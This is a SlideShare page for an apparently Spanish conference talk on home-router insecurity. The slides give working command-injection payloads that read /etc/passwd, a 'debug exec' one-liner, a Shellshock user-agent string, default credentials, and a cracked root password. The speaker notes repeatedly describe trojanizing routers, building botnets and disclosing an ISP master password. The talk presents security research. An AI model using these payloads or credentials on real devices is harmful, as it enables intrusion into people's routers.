SlideShare uma empresa Scribd logo
1 de 50
Routers:
El eslabón mas débil
2/93
Kifo/Cirin/Infiltrandome
• Auditor de seguridad
• Twitter
• Mail
•
3/93
4/93
Disclaimer
• La información, así como las técnicas y herramientas
presentadas, deberán ser utilizadas con fines educativos
o de investigación.
• El autor de la presentación no se responsabiliza por el
uso que se de a este conocimiento.
• Por lo cual se excluye al autor de cualquier delito que
sea cometido con lo comentado en esta presentación.
5/93
Conexión de casa
Router
Internet
6/93
Conexión de casa
Pringao
Router
Internet
7/93
Conexión de casa
H4x0r
Router
Internet
8/93
Noticias
8/93
Noticias
18/93
Noticias
9/93
Usos fraudulentos
• Formar parte de una Botnet
10/93
Usos fraudulentos
• Formar parte de una Botnet
• Suplantación de DNS
11/93
Usos fraudulentos
• Formar parte de una Botnet
• Suplantación de DNS
• Putear al personal
12/93
Usos fraudulentos
• Formar parte de una Botnet
• Suplantación de DNS
• Putear al personal
• ¿Espionaje internacional?
13/93
Fallos de seguridad
Routerpwn.com
11/93
Ruckus
Usuario : super
Clave: sp-admin
33007 posibles
victimas
SANTANDER
Ruckus
;cat /etc/passwd
;cat{IFS}/etc/passwd
MOLA
Ruckus
2/200
Ruckus
Antes:
•;cat /etc/passwd
•;cat{IFS}/etc/passwd
Se reportan al fabricante los fallos.
Ahora:
•&cat{IFS}/etc/passwd
MUCHO
Ruckus
AGAIN !!!
9/4
Ruckus
UFF
Ruckus
Inconvenientes:
UFF
Ruckus
Inconvenientes:
•Necesitas acceso por la IP publica
UFF
Ruckus
Inconvenientes:
•Necesitas acceso por la IP publica
•Usuario y clave por defecto
CACA
Router TD5130
Usuario : admin
Pass: admin
ESCROTO
Router TD5130
1198
Router TD5130
debug exec cmd=“$(for p in $(ls
/proc);do
for i in $(ls /proc/$p/fd);
do cat /etc/passwd > /proc/
$p/fd/$i;done;done)
9/34
Router TD5130
87/34
Router TD5130
9/34
Router TD5130
9/34
Router TD5130
$1$NAxvoJ77$QJSLNH7P6drHD.mac0wpe/:0:0::/tmp/:/bin/sh
- Oye Dudux me puedes
crackear una cosa?
Pásamelo y te lo miro
9/34
Router TD5130
-Tres minutos después……..
9/34
Router TD5130
Ey tío que ya lo tengo, ha salido
muy rápido, no te lo vas a creer.
-Dime dime
-La clave es :
9/34
Router TD5130
Ey tío que ya lo tengo, ha salido
muy rápido, no te lo vas a creer.
-Dime dime
-La clave es :
PleaseChangeMe
9/34
Router TD5130
PleaseChangeMe
9/34
Router TD5130
REMOTEMANAGEMENT : Rangos IPs publicas
9/34
Router TD5130
REMOTEMANAGEMENT : Rangos IPs publicas
9/34
9/34
Caso Hipotético
9/34
Caso Hipotético
Router
Internet
Operadora buenorra
9/34
Caso Hipotético
9/34
Caso Hipotético
RISAS
Caso Hipotético
Yeahhh tu router es mi router primohh !!
99/34
Notas finales
• No necesitas la IP publica de
cada router.
99/34
Notas finales
• No necesitas la IP publica de
cada router.
• Vulnerable aun cambiando
las claves de acceso.
99/34
Futuro
• Modulo metasploit
• Autopwn routers
99/34
Reflexión
HTTP_USER_AGENT=() { :;}; touch /tmp/shellshock
99/34
Tarea para casa
Usuario : admin
Pass: admin
TCPDUMP
WTF???
CASI
Preguntas
FIN
Agradecimientos

Mais conteúdo relacionado

Destaque

64001933 mj-sp-jovenes-emprendedores
64001933 mj-sp-jovenes-emprendedores64001933 mj-sp-jovenes-emprendedores
64001933 mj-sp-jovenes-emprendedoresamautajara
 
2.metabolismo lipidos
2.metabolismo  lipidos2.metabolismo  lipidos
2.metabolismo lipidosraher31
 
Taller Internacional SINERGIZATE
Taller Internacional SINERGIZATETaller Internacional SINERGIZATE
Taller Internacional SINERGIZATELaura Choriego
 
El vóleibol como herramienta para desarrollar los OFT
El vóleibol como herramienta para desarrollar los OFTEl vóleibol como herramienta para desarrollar los OFT
El vóleibol como herramienta para desarrollar los OFTHarrytox
 
Planificación clase digital
Planificación clase digitalPlanificación clase digital
Planificación clase digitalPauly Stephany
 
Lospremiosnobel (1)
Lospremiosnobel (1)Lospremiosnobel (1)
Lospremiosnobel (1)Yolany Mejia
 
El proceso de educir requisitos
El proceso de educir requisitosEl proceso de educir requisitos
El proceso de educir requisitosADRIAN ROMERO
 
Presentacion de perifericos
Presentacion de perifericosPresentacion de perifericos
Presentacion de perifericoscariotefy
 
Sábado santo lecturas
Sábado santo lecturasSábado santo lecturas
Sábado santo lecturasarielcien
 
Pleno (15) 12 noviembre-2013 7ª parte
Pleno (15) 12 noviembre-2013 7ª partePleno (15) 12 noviembre-2013 7ª parte
Pleno (15) 12 noviembre-2013 7ª parteUPyD Parla
 
Ciudad de concepción del uruguay nelida
Ciudad de concepción del uruguay nelidaCiudad de concepción del uruguay nelida
Ciudad de concepción del uruguay nelidanelyelyleguizamon
 

Destaque (20)

64001933 mj-sp-jovenes-emprendedores
64001933 mj-sp-jovenes-emprendedores64001933 mj-sp-jovenes-emprendedores
64001933 mj-sp-jovenes-emprendedores
 
2.metabolismo lipidos
2.metabolismo  lipidos2.metabolismo  lipidos
2.metabolismo lipidos
 
Vacunación en Adultos
Vacunación en AdultosVacunación en Adultos
Vacunación en Adultos
 
Taller Internacional SINERGIZATE
Taller Internacional SINERGIZATETaller Internacional SINERGIZATE
Taller Internacional SINERGIZATE
 
El vóleibol como herramienta para desarrollar los OFT
El vóleibol como herramienta para desarrollar los OFTEl vóleibol como herramienta para desarrollar los OFT
El vóleibol como herramienta para desarrollar los OFT
 
A rmadura
A rmaduraA rmadura
A rmadura
 
Power point
Power pointPower point
Power point
 
Ciencia y religon
Ciencia y religonCiencia y religon
Ciencia y religon
 
Planificación clase digital
Planificación clase digitalPlanificación clase digital
Planificación clase digital
 
Lospremiosnobel (1)
Lospremiosnobel (1)Lospremiosnobel (1)
Lospremiosnobel (1)
 
Exposicion
ExposicionExposicion
Exposicion
 
El proceso de educir requisitos
El proceso de educir requisitosEl proceso de educir requisitos
El proceso de educir requisitos
 
Linda oraci n
Linda oraci nLinda oraci n
Linda oraci n
 
Presentacion de perifericos
Presentacion de perifericosPresentacion de perifericos
Presentacion de perifericos
 
Sábado santo lecturas
Sábado santo lecturasSábado santo lecturas
Sábado santo lecturas
 
Pleno (15) 12 noviembre-2013 7ª parte
Pleno (15) 12 noviembre-2013 7ª partePleno (15) 12 noviembre-2013 7ª parte
Pleno (15) 12 noviembre-2013 7ª parte
 
Ciudad de concepción del uruguay nelida
Ciudad de concepción del uruguay nelidaCiudad de concepción del uruguay nelida
Ciudad de concepción del uruguay nelida
 
Mouses massager
Mouses massagerMouses massager
Mouses massager
 
CIRCOS SIN ANIMALES
CIRCOS SIN ANIMALESCIRCOS SIN ANIMALES
CIRCOS SIN ANIMALES
 
Rc gabriel gomez
Rc gabriel gomezRc gabriel gomez
Rc gabriel gomez
 

Semelhante a Routers, el eslabon mas debil. Sh3llcon

Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos saboresRooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos saboresAlejandro Ramos
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínWebsec México, S.C.
 
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)cl0p3z
 
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...RootedCON
 
Manual de procedimientos de soporte técnico
Manual de procedimientos de soporte técnico Manual de procedimientos de soporte técnico
Manual de procedimientos de soporte técnico Carlos Gomez Delgado
 
Adivina quién viene a CDNear esta noche
Adivina quién viene a CDNear esta nocheAdivina quién viene a CDNear esta noche
Adivina quién viene a CDNear esta nochez0mbiehunt3r
 
Adivina quién viene a CDNear esta noche
Adivina quién viene a CDNear esta nocheAdivina quién viene a CDNear esta noche
Adivina quién viene a CDNear esta nochenavajanegra
 
Presentacionppt1
Presentacionppt1Presentacionppt1
Presentacionppt1VICTORIAZM
 
Detectando DDoS e intrusiones con RouterOS
Detectando DDoS e intrusiones con RouterOSDetectando DDoS e intrusiones con RouterOS
Detectando DDoS e intrusiones con RouterOSPavel Odintsov
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to usnavajanegra
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to usz0mbiehunt3r
 
De presa a cazador Campus Party 2011
De presa a cazador Campus Party 2011De presa a cazador Campus Party 2011
De presa a cazador Campus Party 2011Jhon Jairo Hernandez
 
De presa a cazador
De presa a cazador De presa a cazador
De presa a cazador campus party
 
Exfiltrate your friki_metadata-v3-v-HoneyCON 2019
Exfiltrate your friki_metadata-v3-v-HoneyCON 2019Exfiltrate your friki_metadata-v3-v-HoneyCON 2019
Exfiltrate your friki_metadata-v3-v-HoneyCON 20191v4n (a.k.a. 1r0Dm48O)
 
Manual de procemientos (carlos gomez)1
Manual de procemientos (carlos gomez)1Manual de procemientos (carlos gomez)1
Manual de procemientos (carlos gomez)1Adrian Granados
 
Rompiendo el protocolo: Usos y abusos de TCP/IP
Rompiendo el protocolo: Usos y abusos de TCP/IPRompiendo el protocolo: Usos y abusos de TCP/IP
Rompiendo el protocolo: Usos y abusos de TCP/IPDaniel Torres
 
VPN con RouterOS MikroTik PPTP Server y Client.pdf
VPN con RouterOS MikroTik PPTP Server y Client.pdfVPN con RouterOS MikroTik PPTP Server y Client.pdf
VPN con RouterOS MikroTik PPTP Server y Client.pdfssusere31f1c
 
Backtrack 5 manual traducido
Backtrack 5 manual traducidoBacktrack 5 manual traducido
Backtrack 5 manual traducidossuser8f1d221
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...RootedCON
 

Semelhante a Routers, el eslabon mas debil. Sh3llcon (20)

Essential05
Essential05Essential05
Essential05
 
Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos saboresRooted con 2015 - Rojos y Azules: dos equipos con dos sabores
Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
 
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)Taller de seguridad para servidores GNU/Linux (GSICKMinds)
Taller de seguridad para servidores GNU/Linux (GSICKMinds)
 
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
 
Manual de procedimientos de soporte técnico
Manual de procedimientos de soporte técnico Manual de procedimientos de soporte técnico
Manual de procedimientos de soporte técnico
 
Adivina quién viene a CDNear esta noche
Adivina quién viene a CDNear esta nocheAdivina quién viene a CDNear esta noche
Adivina quién viene a CDNear esta noche
 
Adivina quién viene a CDNear esta noche
Adivina quién viene a CDNear esta nocheAdivina quién viene a CDNear esta noche
Adivina quién viene a CDNear esta noche
 
Presentacionppt1
Presentacionppt1Presentacionppt1
Presentacionppt1
 
Detectando DDoS e intrusiones con RouterOS
Detectando DDoS e intrusiones con RouterOSDetectando DDoS e intrusiones con RouterOS
Detectando DDoS e intrusiones con RouterOS
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to us
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to us
 
De presa a cazador Campus Party 2011
De presa a cazador Campus Party 2011De presa a cazador Campus Party 2011
De presa a cazador Campus Party 2011
 
De presa a cazador
De presa a cazador De presa a cazador
De presa a cazador
 
Exfiltrate your friki_metadata-v3-v-HoneyCON 2019
Exfiltrate your friki_metadata-v3-v-HoneyCON 2019Exfiltrate your friki_metadata-v3-v-HoneyCON 2019
Exfiltrate your friki_metadata-v3-v-HoneyCON 2019
 
Manual de procemientos (carlos gomez)1
Manual de procemientos (carlos gomez)1Manual de procemientos (carlos gomez)1
Manual de procemientos (carlos gomez)1
 
Rompiendo el protocolo: Usos y abusos de TCP/IP
Rompiendo el protocolo: Usos y abusos de TCP/IPRompiendo el protocolo: Usos y abusos de TCP/IP
Rompiendo el protocolo: Usos y abusos de TCP/IP
 
VPN con RouterOS MikroTik PPTP Server y Client.pdf
VPN con RouterOS MikroTik PPTP Server y Client.pdfVPN con RouterOS MikroTik PPTP Server y Client.pdf
VPN con RouterOS MikroTik PPTP Server y Client.pdf
 
Backtrack 5 manual traducido
Backtrack 5 manual traducidoBacktrack 5 manual traducido
Backtrack 5 manual traducido
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 

Último

rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxssuser61dda7
 
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDGRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDLeslie Villar
 
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptxCamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptx241518192
 
Software y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfSoftware y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfDanielaEspitiaHerrer
 
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdfFernandaHernandez312615
 
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAFisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAcoloncopias5
 
que es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxque es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxmrzreyes12
 
Tema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxTema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxchinojosa17
 
El uso de las tic en la vida continúa , ambiente positivo y negativo.
El uso de las tic  en la vida continúa , ambiente positivo y negativo.El uso de las tic  en la vida continúa , ambiente positivo y negativo.
El uso de las tic en la vida continúa , ambiente positivo y negativo.ayalayenifer617
 
GRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxGRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxNicolas Villarroel
 
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...#LatamDigital
 
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfFLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfYuriFuentesMartinez2
 
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.Aldo Fernandez
 
Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)BrianaFrancisco
 

Último (14)

rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
 
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDGRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
 
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptxCamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
 
Software y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfSoftware y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdf
 
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
 
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAFisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
 
que es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxque es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptx
 
Tema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxTema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptx
 
El uso de las tic en la vida continúa , ambiente positivo y negativo.
El uso de las tic  en la vida continúa , ambiente positivo y negativo.El uso de las tic  en la vida continúa , ambiente positivo y negativo.
El uso de las tic en la vida continúa , ambiente positivo y negativo.
 
GRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxGRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptx
 
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
 
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfFLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
 
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
 
Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)
 

Routers, el eslabon mas debil. Sh3llcon

Notas do Editor

  1. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  2. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  3. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  4. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  5. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  6. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  7. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  8. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  9. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los 